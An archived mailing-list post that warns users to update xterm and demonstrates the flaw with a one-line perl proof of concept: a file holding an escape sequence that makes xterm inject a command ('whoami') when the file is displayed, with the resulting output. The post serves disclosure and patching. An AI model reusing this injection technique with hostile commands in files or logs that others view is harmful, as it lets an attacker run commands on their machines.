[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

security update for xterm needed



Hi folks,

I will file a bug becasue of this, but you should be sure to update
xterm asap, if you use it:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030

I testet on fedora 10 accordign to
http://www.heise.de/newsticker/Terminal-Emulator-xterm-fuehrt-untergeschobene-Befehle-aus--/meldung/121196
(sorry, german)

I tried:

[choeger choeger5 ~]$ perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log

and in xterm:

[choeger choeger5 ~]$ cat bla.log 
^[P0$r

whoami

^[\[choeger choeger5 ~]$ 
[choeger choeger5 ~]$ whoami
choeger
[choeger choeger5 ~]$ 
[choeger choeger5 ~]$ 

As you can see, its valid.



Attachment: signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]